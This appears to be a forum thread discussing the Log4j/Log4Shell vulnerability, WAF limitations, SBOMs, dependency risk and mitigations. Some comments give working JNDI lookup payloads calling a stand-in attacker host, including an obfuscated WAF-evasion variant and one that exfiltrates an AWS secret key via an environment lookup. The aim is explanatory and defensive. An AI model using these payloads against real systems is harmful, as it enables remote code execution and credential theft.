Sadly, every WAF vendor is falling over itself to claim otherwise. I've already had arguments with senior leadership who suggest there's no need to worry about patching because multiple vendors have promised their solutions are better.
The further I get into security the more embarrassed I am for some of the offerings.
I'm half convinced you can build a successful cybersecurity business by putting a box in a network that does absolutely nothing. I think there's a requirement to at least show a blinking LED and have a (not necessarily patched) cable plugged in, but that's about it.
My thinking is that if you show a cool enough interface (not connected to the box), with lots of widgets and stats, and they don't detect a hack within two years, you can probably walk away with a pretty penny! If they do get hacked, just pretend you technically _did_ see the alert, but a junior employee on your side failed to act on it. Sack them, then re-hire them later; they're the 'fall' person whose job is basically getting fired. Give your customer a discount and try to stay on for two more years!
> Case in point: the Air Gap. Levy set up a website showcasing a magic amulet of his own creation. Like many cyber defences, his piece of hardware promised to defend against all known and unknown viruses, and stop zero day exploits. His product? An empty box with a blue blinking light on it. Levy had to take his website offline when he started getting sales enquiries by email.
That's pretty much what I've experienced myself at one point.
We had a client sending extremely sensitive data around by email. One day I was told we should all relax: the problem had been solved. You see, he'd been sold a PGP hardware appliance.
As the person running the mail system, I could attest that mail wasn't flowing through it. It was literally in a rack. I don't even think it was given an IP address on their actual network. Multiple auditors came in to review the safety of the sensitive data that we had. They were all shown pictures of the rack with the PGP appliance in it, and that always was considered sufficient.
This reminds me a lot of audiophile woo as well. It seems like this sort of grift could be applied to just about anything where the technology is indistinguishable from magic.
I once saw a spray for CDs that would "absorb stray laser light" or something like that. The bit that gets me is that according to the instructions you're supposed to spray it only on the label side of the disc.
The devil is in the details. As a random example, you might have a process where all the pre-WAF requests (or explicitly the requests blocked by WAF) get forwarded to a log analysis system that itself uses log4j and is vulnerable, allowing the attacker to gain RCE in your monitoring infrastructure.
Also, blocking any request containing "{" is tricky: it's so generic that verifying it won't break anything is time-consuming, and JSON is almost certainly used somewhere in that application traffic, so you can't simply do that.
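For context, the vulnerable pattern is nothing more exotic than logging attacker-influenced input. A minimal sketch (the class, method, and header name are made up for illustration; `logger` is a Log4j 2 `Logger`):

```java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;

public class VersionCheck {
    private static final Logger logger = LogManager.getLogger(VersionCheck.class);

    // Hypothetical handler: logs a client-supplied header value, as countless apps do.
    // With a vulnerable log4j-core on the classpath, the ${...} lookup inside the value
    // is evaluated when the message is formatted, so parameterized logging ({}
    // placeholders) offers no protection.
    void handle(String apiVersionHeader) {
        // An attacker sends e.g.:
        //   X-Api-Version: ${jndi:ldap://attacker.example.com/a}
        // or, to slip past naive pattern-matching WAF rules:
        //   X-Api-Version: ${${lower:j}${lower:n}di:ldap://attacker.example.com/a}
        logger.info("Client API version: {}", apiVersionHeader);
    }
}
```

The obfuscated variant is why simple string matching on "jndi" or "ldap" at the WAF is not a reliable fix either.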
No. The stakeholders are busy patching their shit. Pulling folks into meetings shouldn't be the priority when teams around the world, in virtually every tech organization, are in firefighting mode.
This type of call would likely be focused on assessing the current state at that point.
I work at one of the largest financial orgs in the world as a Java dev on a critical system (albeit not internet-facing), and I learned of this just now from this thread...
Edit: upon checking, we're safe; it doesn't impact Log4j 1, only the second version. We're not cowboys using versions as young as 2012, lol.
I'm sure many folks here spent their Friday, Saturday, and possibly even Sunday patching, and won't speak up in case their profile connects to their company.
Friday mid-afternoon, a Google search for the exploit showed there were many websites in several languages giving instructions on how to exploit the vulnerability. This is hitting hard and fast.
It was on the news in my country. There have been several notable ransomware attacks in the last few years, it's become an issue for a country and government that's gone all in on digital.
No, they are managing the teams patching things and helping with prioritization.
If the stakeholders participating in the call on Monday are not the people working on patching, managing, or prioritizing, then having the call earlier than that is pointless, because those stakeholders are too removed from the situation, and getting that information will detract from getting work done.
It's pretty simple really, having a status or coordination call while the work is being done is roughly analogous to a photo-op by a politician during an emergency. It looks good for the voters, but it takes away resources from the folks who are actually doing the work.
> We have established a JCDC senior leadership group to coordinate collective action and ensure shared visibility into both the prevalence of this vulnerability and threat activity
I recall some US gov agency, possibly the IRS of all things, that would only accept forms being submitted during US working hours. Because the computers also need time off I guess?
In some cases I know of (with smaller orgs), it happens because someone put in a requirement that incidents with the service be responded to within X hours, but didn't provide the budget for the employees or external service needed to cover that 24/7.
I've heard of similar things being done for ADA compliance. Something about requiring a phone line to be up at all the same times as the website so instead of a 24/7 call center you just turn the site off.
This is pretty awful. It seems easy to fuzz every input form and API param to see which websites are vulnerable just by seeing which probes get a response. Once a site is found to be vulnerable, a malicious actor can try to funnel all logs to an external server, add a remote shell, and potentially scan the production network of whatever was running log4j. Once in the internal network, they can again scan for log4j exploits. Too many groups blanket-whitelist cloud IP ranges like AWS Lambda's. It seems like there will be a cascade of Experian-level data leaks coming. Even if things are somewhat locked down, we've seen time and time again that there's internal sprawl, where access to an internal bucket or git repo, or an escalation in the CI/CD pipelines, leads to full access, then data dumps/leaks.
I’m sure this is the only community that might pay attention to a software BOM as mentioned in the article, but this is a great idea and makes a lot of sense (to me as a consumer at least).
Developers are relying more and more on automated scanners and the like to manage this. Your modern Python or JavaScript stack just has way too many packages, and they change daily. Just look at your dependency lockfile balloon when a random dependency updates a point release and brings in a few more packages. It's really a horrible thing.
I'd like to say the scanners were fast, but they weren't fast enough, because the first wave of attacks was nearly instant. This was definitely a nightmare scenario, where a simple unauthenticated GET could pull in a kit that was already live and ready to go.
I don't think anyone in the Java community is surprised to find they have a dependency on Log4j. It's one of those libraries used so widely that it's practically stdlib.
In the production of electronic things I've been pointing out that software needs to be on the BOM for other reasons. It is so often overlooked and considered zero cost even though companies pay people to develop it.
Making people look at a BOM would also discourage the mess that is npm.
Most systems use package management now; npm is only the poster child.
Reviewing a stack of BOMs is going to be a challenge for any organization. Say your production Linux has 1000 packages. Each of those might have hundreds or thousands of deps in varying versions, in their respective package managers (BOMs).
Business needs to step up its process game. How are BOMs (dep lists) reviewed? Do we expect zero CVEs? How do you filter out false positives, or irrelevant ones? Do you dump everything with that dep or help the maintainer fix it? Many questions.
We do something along this axis with our products. We have to be able to provide B2B software that will be stable on timelines measured in half-decades (per contractual requirements), so the specific vendors we decide to depend upon are a huge part of our decision making process. I will happily admit we probably wrote a little bit too much stuff in-house, but the number of clear wins easily outweighs the "no DIY allowed" concerns.
Getting us to vendor out something like logging/tracing/telemetry would take an act of god at this point. We explicitly spent a week ripping out Microsoft's byzantine logging from AspNetCore in favor of something we could trust and understand. Our entire logging framework now lives in 1 class file and consists of maybe 30 useful lines of source code. None of them have the capability to reach out to a remote host, download a DLL and then execute it in the current context. This sort of problem we are seeing with Log4j today is precisely the sort of experience we hope to avoid by doing a lot of our tooling in-house.
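The commenter's code is C#, but as a rough illustration of the idea (not their actual framework), a "no surprises" logger in Java can be about this small; the class name and file path are made up:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.nio.file.StandardOpenOption;
import java.time.Instant;

// A deliberately dumb logger: format a line, append it to a file. No lookups,
// no interpolation of the message contents, no class loading, no network access.
public final class PlainLogger {
    private final Path file;

    public PlainLogger(Path file) { this.file = file; }

    public void info(String message)  { write("INFO", message); }
    public void error(String message) { write("ERROR", message); }

    private void write(String level, String message) {
        String line = Instant.now() + " [" + level + "] " + message + System.lineSeparator();
        try {
            Files.writeString(file, line, StandardOpenOption.CREATE, StandardOpenOption.APPEND);
        } catch (IOException e) {
            // Last resort: never let logging take the application down.
            System.err.print(line);
        }
    }
}
```

You give up pattern layouts, appender plugins, and async buffering, but the entire attack surface is something you can read in one sitting.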
I think those who parroted "don't reinvent the wheel" over and over like it's some doomsday cult should accept some shame for the situation many developer ecosystems find themselves in today.
The French announcement mentions this:
"In general, it seems that the use of a Java runtime environment in version 8u121 or later makes it possible to guard against the main attack vector mentioned by the researchers behind the discovery."
As has been commented several times on other threads here on HN, a new enough Java only protects against one kind of exploit (directly loading arbitrary bytecode) but not others (serialization tricks to execute arbitrary function calls, or data exfiltration).
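To make the exfiltration case concrete with the most commonly cited example (header name and environment variable are placeholders): even on a JVM where remote codebase loading is disabled, which is the hardening the French advisory refers to, vulnerable Log4j versions still resolve nested lookups before making the outbound JNDI request, so a request header like

```
X-Api-Version: ${jndi:ldap://attacker.example.com/${env:AWS_SECRET_ACCESS_KEY}}
```

leaks the secret to the attacker's LDAP/DNS infrastructure as part of the lookup itself, without any remote class ever being loaded.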
I was just digging into Cloud Native Buildpacks (buildpacks.io) as an alternative to Dockerfiles yesterday and realised that they actually have SBOM generation built in for popular languages, which is a really nice, easy security-infrastructure upgrade for everyone using them.
Spring Boot apps aren't affected by this unless you switched logging frameworks. Nor any JBoss frameworks. How many people actually use Log4j2? It's probably in 4th or 5th place among Java logging frameworks, and likely still has less uptake than the original Log4j.
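If you're not sure whether a given service pulls in log4j-core (directly or transitively), the build tool's dependency report answers it quickly. For Maven and Gradle projects respectively, something like:

```
mvn dependency:tree -Dincludes=org.apache.logging.log4j:log4j-core

./gradlew dependencies --configuration runtimeClasspath | grep -i log4j
```

Note that log4j-api alone is not the problem; it's log4j-core that contains the vulnerable JNDI lookup.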
There's a lot of talk now about a number of things, including web application firewalls and how we must fund open source, and I hope something good comes out of it.
However, what I wonder is why we are still in a position where every single application and every single dependency can attempt to load DLLs (cf. the recent npm hacks) or reach out to the network.
Why is Deno the only one that seems to have a good solution for this, and why doesn't Deno have more traction?
I know one can do a lot more using outbound firewalls and SELinux, but after seeing how brilliantly Deno solves this, I wonder why not every program lets me do this.
The idea of having different declarative security realms is fine but it's not what the Java Security Manager is.
The Java Security Manager is an API that lets you intercept and run code, so devs use it as a Trojan horse to patch code instead of fixing the root of the issue.
Deno solves this by making you specify, on the command line or in a config file, what an application should have access to. For instance, for a simple web application you can specify that it only has read access to one folder of static files, write access to the log folder, and can only connect to the Postgres server. It is also very simple; see the sketch below.
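Something along these lines, as a sketch: the paths, the entry point, and the Postgres host are placeholders, but `--allow-read`, `--allow-write`, and `--allow-net` are the real Deno permission flags.

```
deno run \
  --allow-read=./static \
  --allow-write=./logs \
  --allow-net=db.internal.example:5432 \
  server.ts
```

Anything not granted, including outbound connections to arbitrary hosts, is denied by default and fails with a permission error at runtime.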
As for the first part, I'm in the lucky position where nobody can just rewrite everything to today's flavor of JS, but where we can decide in the team to test out new technology when we have a chance to, for example on a new small project. There's another guy on the team who is enthusiastic about it too, and I guess he'll throw together a demo soon; then we'll discuss it.
Thanks for your time. I am about to start a new personal project and your post, combined with some curiosity, is all I needed to hear. I've reached a point where doing the same thing with the same tech is making me feel uneasy.
That said: what I have seen seems extremely interesting: the audited standard library, the permission model, the built-in support for TypeScript, the single-binary runtime, and the avoidance of a single package repo.
Good luck with your next personal project. I guess now might be a perfect time to invest in learning Deno. It might not take off, but if it doesn't, it will probably make me a little sad when I realize it, and I am a Java man (although I enjoy a number of other languages as well).
Are you using Elasticsearch, Flink, Spark, Presto, etc.? Do they read in user data supplied by your front end? Could this user data end up being logged, intentionally or as part of an error log output?
If so, you might be vulnerable and should update those systems.
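For what it's worth, the stopgaps circulating this weekend for systems you can't update immediately boil down to disabling message lookups or stripping the JNDI lookup class from the jar; these are the widely published generic mitigations, not anything specific to the products named above, and upgrading remains the real fix:

```
# On Log4j 2.10+ you can disable message lookups via a system property...
java -Dlog4j2.formatMsgNoLookups=true -jar service.jar
# ...or an environment variable:
export LOG4J_FORMAT_MSG_NO_LOOKUPS=true

# For older 2.x versions, remove the vulnerable class from the jar entirely:
zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class
```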
It doesn't matter. An nginx web server logs an odd user agent; Elasticsearch picks it up. And then, due to some error triggered by the attacker, the content of the web server log line gets logged on the ES side (for example, if it violates a constraint). Frontend bypassed, attacker owns ES. I've spent my weekend celebrating that I don't have Java software in a stack that I'm responsible for right now, and feeling sorry for my ex-colleagues who do.
Edit: I haven’t tested or checked whether ES is vulnerable or not - but given the severity of this issue I’d default to the pessimistic stance of assuming it is, until proven otherwise.
As a frontend dev, shouldn't you worry about your clients rather than the boundaries of your organisation? Harass whoever is putting the log4j dependency in the backend until they patch; don't expect them to know by default.
I'm seeing that on 7.15, Logstash and Elasticsearch both ship log4j in the vulnerable range, but in my case I'm running a new enough Java that it shouldn't be an issue.
As has been commented several times on other threads here on HN, a new enough Java only protects against one kind of exploit (directly loading arbitrary bytecode) but not others (serialization tricks to execute arbitrary function calls, or data exfiltration).